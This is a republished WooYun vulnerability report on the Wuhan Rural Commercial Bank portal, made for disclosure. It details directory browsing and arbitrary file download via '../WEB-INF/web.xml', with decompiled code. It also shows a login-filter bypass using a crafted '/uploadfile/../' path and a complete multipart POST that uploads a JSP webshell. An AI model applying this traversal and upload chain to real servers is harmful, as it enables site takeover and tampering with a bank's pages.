武汉市农村商业银行门户网站多处漏洞

admin
admin
admin
146030
文章
119
评论
2015年7月23日01:37:21评论238 views字数 236阅读0分47秒阅读模式
摘要

2014-10-29: 细节已通知厂商并且等待厂商处理中
2014-10-31: 厂商已经确认,细节仅向厂商公开
2014-11-10: 细节向核心白帽子及相关领域专家公开
2014-11-20: 细节向普通白帽子公开
2014-11-30: 细节向实习白帽子公开
2014-12-11: 细节向公众公开

漏洞概要 关注数(7) 关注此漏洞

缺陷编号: WooYun-2014-80996

漏洞标题: 武汉市农村商业银行门户网站多处漏洞

相关厂商: 武汉市农村商业银行

漏洞作者: cyber_jt

提交时间: 2014-10-29 17:46

公开时间: 2014-12-11 17:48

漏洞类型: 文件上传导致任意代码执行

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

1人收藏

漏洞详情

披露状态:

2014-10-29: 细节已通知厂商并且等待厂商处理中
2014-10-31: 厂商已经确认,细节仅向厂商公开
2014-11-10: 细节向核心白帽子及相关领域专家公开
2014-11-20: 细节向普通白帽子公开
2014-11-30: 细节向实习白帽子公开
2014-12-11: 细节向公众公开

简要描述:

武汉市农村商业银行门户网站存在多处漏洞可GetShell,可篡改网站信息。

详细说明:

武汉市农村商业银行门户网站:http://**.**.**.**、**.**.**.**:8081/whrcbank,其中http://**.**.**.**是反向代理服务器。目标网站存在多处安全漏洞,如下:

1.目录浏览

http://**.**.**.**/upload/

2.任意文件下载:

http://**.**.**.**/downLoad?fileName=../WEB-INF/web.xml

3.任意类型文件上传

通过下载漏洞找到上传地址~/background/down/adddown

code 区域 
<servlet>
  <servlet-name>addDownController</servlet-name>
     <servlet-class>com.jetsum.down.addDownServlet</servlet-class>
   </servlet>
   <servlet-mapping>
  <servlet-name>addDownController</servlet-name>
  <url-pattern>/background/down/adddown</url-pattern>
   </servlet-mapping>

对应的类addDownServlet中:

code 区域 
...
       SmartUpload mySmartUpload = new SmartUpload();
       JspFactory factory = JspFactory.getDefaultFactory();
       PageContext pageContext = factory.getPageContext(this, request, response, null, false, -1, true);
 
       mySmartUpload.initialize(pageContext);
       mySmartUpload.setTotalMaxFileSize(524288000L);
       mySmartUpload.upload();
       File files = mySmartUpload.getFiles().getFile(0);
       file = files.getFileExt();
       number = String.valueOf(files.getSize());
       url = toChinese.toChinese(files.getFileName());
 
       String path = getServletContext().getRealPath("/");
 
       String newFileName = TypeInfo.generalSrid();
 
       url = newFileName + "." + file;
       File myFile = null;
       if (mySmartUpload.getFiles() != null) {
         myFile = mySmartUpload.getFiles().getFile(0);
         myFile.saveAs(path + "/upload/" + url);
       }
 ...

从这个过程可知对上传文件类型没有任何限制,可以上传jsp文件获得WebShell。

4.绕过过滤器检验

要通过2实现上传文件,还需要通过过滤器logincheckfilter的验证。

code 区域 
<filter>
 <filter-name>logincheckfilter</filter-name>
 <filter-class>bookstore.servlet.LoginCheckFilter</filter-class>
 </filter>
 <filter-mapping>
 <filter-name>logincheckfilter</filter-name>
 <url-pattern>/background/*</url-pattern>
 </filter-mapping>
 <filter>

在类LoginCheckFilter中:

code 区域 
public void doFilter(ServletRequest request, ServletResponse response, FilterChain filterChain)
   {
     try
     {
       HttpServletRequest httpRequest = (HttpServletRequest)request;
       HttpServletResponse httpResponse = (HttpServletResponse)response;
       boolean isValid = false;
       String hURLStr = httpRequest.getRequestURI();
       String uriStr = "";
       String uriStrU = "";
       String webStr = "";
       uriStrU = hURLStr.toUpperCase();
 
       uriStr = uriStrU.substring(uriStrU.length() - 10, uriStrU.length());
 
       if (hURLStr.length() > 46)
       {
         webStr = uriStrU.substring(uriStrU.length() - 33, uriStrU.length() - 21);
       }
 
       if ((uriStr.endsWith("BACKGROUND")) || (uriStr.equals("/LOGIN.JSP")) || (httpRequest.getSession
 
 ().getAttribute("username") != null)) {
         isValid = true;
       }
 
       if (webStr.equals("/UPLOADFILE/"))
       {
         isValid = true;
       }
 
       if (isValid) {
         filterChain.doFilter(request, response); return;
       }
 
       httpResponse.sendRedirect("../loginerror.jsp");
     }
     catch (ServletException sx)
     {
       this.filterConfig.getServletContext().log(sx.getMessage());
     }
     catch (IOException iox) {
       this.filterConfig.getServletContext().log(iox.getMessage());
     }
   }

当webStr.equals("/UPLOADFILE/")成立时会通过验证,因此只要把上传提交地址~/background/down/adddown变换为~/background////uploadfile/.././././down/adddown就可以通过这个验证了。这里只能使用**.**.**.**:8081/whrcbank,不能用http://**.**.**.**,因为反向代理服务器会把~/background////uploadfile/.././././down/adddown转换成/background////down/adddown发送到WEB服务器上,也就失去绕过的能力了。

5.综上:

code 区域 
POST /whrcbank/background////uploadfile/.././././down/adddown HTTP/1.1
 Host: **.**.**.**:8081
 Connection: keep-alive
 Content-Type: multipart/form-data; boundary=---------------------------151752906420650
 Content-Length: 245
 
 -----------------------------151752906420650
 Content-Disposition: form-data; name="newFile"; filename="test.jsp"
 Content-Type: application/octet-stream
 
 <%="hello world!"%>
 -----------------------------151752906420650--

漏洞证明:

http://**.**.**.**/upload/201410271541530055.jsp

武汉市农村商业银行门户网站多处漏洞

如果攻击者对这个地方的链接地址进行篡改,可能会造成比较重大的影响:

武汉市农村商业银行门户网站多处漏洞

修复方案:

漏洞细节比较简单明白,不多细说。

很多企业单位对托管后的门户网站安全重要性认识不足。门户网站之所以在企业信息安全具有重要地位在于它不止是否是企业网络链路上的节点,还在于它是企业业务逻辑上的门户。门户网站上通常发布着企业最基本信息,比如企业邮件系统的链接地址、VPN登录链接地址、客户端程序的下载等等,门户网站使用者对其信息是高度信任的,如果这些最基本的信息被篡改,无疑会产生较为深远的影响。笔者最近看过一个渗透测试项目,测试者就是通过某大企业托管在外门户网站漏洞,最后实现对企业内网中大量重要系统的渗透。希望企业单位加强对这方面的重视。

版权声明:转载请注明来源 cyber_jt@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-10-31 17:59

厂商回复:

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2014-10-27 18:35 | GDH ( 路人 | Rank:2 漏洞数:1 | 谢谢大家对我的支持!)

    0

    记者看这里!!!

  2. 2014-10-27 21:38 | cuger ( 普通白帽子 | Rank:209 漏洞数:48 | 都说爱笑的人运气不会太差,废话,运气太差...)

    0

    老网站已经停止维护了,马上要上新网站了

  3. 2014-10-28 10:01 | 问题来了 ( 普通白帽子 | Rank:201 漏洞数:23 | 挖漏洞哪家强)

    0

    洞主继续干翻新网站。。。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin